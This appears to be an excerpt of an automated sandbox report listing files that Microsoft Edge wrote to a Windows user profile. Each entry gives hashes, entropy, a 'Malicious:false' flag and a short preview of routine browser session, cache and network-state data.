                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6287
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.386904174834143
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:xmIaEGmT0sCH9Xp+LDTiADiLl9iSrWThQYH:xmRmTs9Xp+jOLl9iSrSBH
                                                                                                                                                                                                                                                                                          MD5:3EE0455CD8BA14FB5DE935B46CC419C1
                                                                                                                                                                                                                                                                                          SHA1:B25C9069B2F59EC2F0355545796E58AC3C49C508
                                                                                                                                                                                                                                                                                          SHA-256:570601CA34D6D97BEC6ED3A7FF56940B28A8110976B6897F320FB27A5443AB16
                                                                                                                                                                                                                                                                                          SHA-512:EBF4F5F800BEA9A1FC2B4607D22FD94B090337C29D0CDF17F944C3488E7A2458FD7211394EE770E0B8E56B5422A5A205CBEA40856EBA16AB22835CC7171E87DC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................Cb................next-map-id.1.Cnamespace-f75a3bdb_b60d_4494_84ee_75743b465b1a-https://ntp.msn.com/.0V.e................V.e................V.e................X.v*J................map-0-shd_sweeper..{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.c.p.r.g.-.c.-.p.o.l.i.s.h.-.s.t.y.l.e.s.,.p.r.g.-.a.d.-.c.-.s.t.a.b.-.b.n.,.p.r.g.-.c.-.s.t.a.b.-.b.n.,.p.r.g.-.1.s.w.-.s.a.-.s.p.6.-.t.5.,.p.r.g.-.1.s.w.-.s.a.l.3.f.c.t.b.0.,.p.r.g.-.1.s.w.-.c.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.p.r.g.-.1.s.w.-.h.e.a.d.e.r.-.e.v.e.n.t.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.p.r.1.-

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):327
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.24070437484559
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Roq+q2PcNwi23oH+TcwtrQMxIFUt8O8RoQZmw+O8RokVkwOcNwi23oH+Tcwtrb:7pLvLZYebCFUt8OpQ/+Opk54ZYebtJ
                                                                                                                                                                                                                                                                                          MD5:5959BF52E1C9AF89913702A0797BDBCA
                                                                                                                                                                                                                                                                                          SHA1:777BC01C4404097DC6274AF0C37C55EACB41B385
                                                                                                                                                                                                                                                                                          SHA-256:4FBFB52A48A22309AB437ED87B45F7685139B1CE37C75922ABA2C0C2A4890153
                                                                                                                                                                                                                                                                                          SHA-512:931AB48592A9617CC0FA92697851AEA5F5BA1F1AFFD273B28135F8C6765552C6E994739B4CE8BB1E5BA2D3525F2D0D4EE3461DC0C8D2FCC21019B421E8AAF224
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.563 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/19-03:45:53.569 788 Recovering log #3.2024/12/19-03:45:53.572 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):327
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.24070437484559
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Roq+q2PcNwi23oH+TcwtrQMxIFUt8O8RoQZmw+O8RokVkwOcNwi23oH+Tcwtrb:7pLvLZYebCFUt8OpQ/+Opk54ZYebtJ
                                                                                                                                                                                                                                                                                          MD5:5959BF52E1C9AF89913702A0797BDBCA
                                                                                                                                                                                                                                                                                          SHA1:777BC01C4404097DC6274AF0C37C55EACB41B385
                                                                                                                                                                                                                                                                                          SHA-256:4FBFB52A48A22309AB437ED87B45F7685139B1CE37C75922ABA2C0C2A4890153
                                                                                                                                                                                                                                                                                          SHA-512:931AB48592A9617CC0FA92697851AEA5F5BA1F1AFFD273B28135F8C6765552C6E994739B4CE8BB1E5BA2D3525F2D0D4EE3461DC0C8D2FCC21019B421E8AAF224
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.563 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/19-03:45:53.569 788 Recovering log #3.2024/12/19-03:45:53.572 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379071555213427

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8075574854030916
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:38Uhv824WRHWZ4psAF4unxYtLp3X2amEtG1Chq5WLLNQ8lIHbQKkOAM4O4:38iE6RZzF2Lp2FEkChQWfxVHOp74
                                                                                                                                                                                                                                                                                          MD5:D24AC2C54B2ECBD1CF6A56D745BCC077
                                                                                                                                                                                                                                                                                          SHA1:10F1B4EA43C879EBE5C997BD313FB71150EEBE62
                                                                                                                                                                                                                                                                                          SHA-256:BDC61D63960186CA37EB2E4A827ADE6474E37BA45907F799B47E5D3B9DF779FE
                                                                                                                                                                                                                                                                                          SHA-512:EEEEB604AEC8337A09BA7102A59713839E0557EF76DA0ED1713673104FF1EA1A3AFB7800A89D4D8B3C8E139DBF00FA4BEDB6912292AB05D18E0781E569FEE29C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SNSS.......2.bv...........2.bv......"2.bv...........2.bv.......2.bv.......3.bv.......3.bv....!..3.bv...............................2.bv3.bv1..,...3.bv$...f75a3bdb_b60d_4494_84ee_75743b465b1a...2.bv.......3.bv...............2.bv...2.bv.......................2.bv....................5..0...2.bv&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}.....2.bv.......2.bv..........................3.bv...........3.bv........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......Z....)..[....).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):358
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.193099042730825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Rfv4q2PcNwi23oH+Tcwt7Uh2ghZIFUt8O8RLcNJZmw+O8RLcNDkwOcNwi23oHT:7dvLZYebIhHh2FUt8Ocg/+OcI54ZYebs
                                                                                                                                                                                                                                                                                          MD5:FA967DB7E313B8076DA894609C02B920
                                                                                                                                                                                                                                                                                          SHA1:E841398A15AC878EBBFA17B59DC82226DA01045B
                                                                                                                                                                                                                                                                                          SHA-256:10AB89920358483ED9BCE3A3213269D5FAD63F8E7C5B52839E6AEFFDFD8151C8
                                                                                                                                                                                                                                                                                          SHA-512:9C7E6BF36872BFEAFF8571E3265A552E4C630EB148C58316A5B900BD4C81E872B0160638CD9EFE487985D4D68500B0CA7A24A46898A95A4C779955D41C6657FE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.710 19d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/19-03:45:52.825 19d4 Recovering log #3.2024/12/19-03:45:52.825 19d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):358
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.193099042730825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Rfv4q2PcNwi23oH+Tcwt7Uh2ghZIFUt8O8RLcNJZmw+O8RLcNDkwOcNwi23oHT:7dvLZYebIhHh2FUt8Ocg/+OcI54ZYebs
                                                                                                                                                                                                                                                                                          MD5:FA967DB7E313B8076DA894609C02B920
                                                                                                                                                                                                                                                                                          SHA1:E841398A15AC878EBBFA17B59DC82226DA01045B
                                                                                                                                                                                                                                                                                          SHA-256:10AB89920358483ED9BCE3A3213269D5FAD63F8E7C5B52839E6AEFFDFD8151C8
                                                                                                                                                                                                                                                                                          SHA-512:9C7E6BF36872BFEAFF8571E3265A552E4C630EB148C58316A5B900BD4C81E872B0160638CD9EFE487985D4D68500B0CA7A24A46898A95A4C779955D41C6657FE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.710 19d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/19-03:45:52.825 19d4 Recovering log #3.2024/12/19-03:45:52.825 19d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zEZlCll:/M/xT02zv
                                                                                                                                                                                                                                                                                          MD5:50B2E4A56B1824AE1FC2DAA70A971A84
                                                                                                                                                                                                                                                                                          SHA1:0A69059C919B01A6C221E859EAB3BEEEECFB6D91
                                                                                                                                                                                                                                                                                          SHA-256:A76892EBE1852C2149517932A1AA2905C3F0AF41951CC62AD7C4B0CB51B857EA
                                                                                                                                                                                                                                                                                          SHA-512:FAB40A873BF8E57539402C5173538C8847BF74E11CF51C34F8743DCC32F1B488BC06CDB4011DC774E3C7C9646F4888C5DFE0BDAE1CA98428BD81F291A8E85270
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):440
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.26439795867681
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7palL+vLZYebvqBQFUt8OpyC/+OpRLV54ZYebvqBvJ:7pa6lYebvZg8OpxpZoYebvk
                                                                                                                                                                                                                                                                                          MD5:4BB461C192AA44940D49A19DC0BD7EFB
                                                                                                                                                                                                                                                                                          SHA1:C0B52E7A235EDA7D74776B31FC7CCC173D0F7710
                                                                                                                                                                                                                                                                                          SHA-256:7CECBFBD3F1FD0F231774E13EBF7FDE2A417A36FF9B5A0BEFA2D97ABF4FF5F21
                                                                                                                                                                                                                                                                                          SHA-512:098AA03AA39038EDC86B9E3E68BDAC94D7FA61FF9BC5FAF1D84E9B69B40B65585BF12893FF142BF1EA2FE844A5C5E4CE951146116C3ECF842133715DD01D12B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.576 14ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/19-03:45:53.577 14ac Recovering log #3.2024/12/19-03:45:53.582 14ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):440
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.26439795867681
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7palL+vLZYebvqBQFUt8OpyC/+OpRLV54ZYebvqBvJ:7pa6lYebvZg8OpxpZoYebvk
                                                                                                                                                                                                                                                                                          MD5:4BB461C192AA44940D49A19DC0BD7EFB
                                                                                                                                                                                                                                                                                          SHA1:C0B52E7A235EDA7D74776B31FC7CCC173D0F7710
                                                                                                                                                                                                                                                                                          SHA-256:7CECBFBD3F1FD0F231774E13EBF7FDE2A417A36FF9B5A0BEFA2D97ABF4FF5F21
                                                                                                                                                                                                                                                                                          SHA-512:098AA03AA39038EDC86B9E3E68BDAC94D7FA61FF9BC5FAF1D84E9B69B40B65585BF12893FF142BF1EA2FE844A5C5E4CE951146116C3ECF842133715DD01D12B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.576 14ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/19-03:45:53.577 14ac Recovering log #3.2024/12/19-03:45:53.582 14ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\1102cbb4-5f6e-40e8-9dbb-bd2ff66d5ef9.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6d5d08cc-6c2e-4411-9ce2-f676466b1a88.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):111
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                          MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                          SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                          SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                          SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\73b96885-86fe-4aee-9325-f197bc77b251.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):111
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                          MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                          SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                          SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                          SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
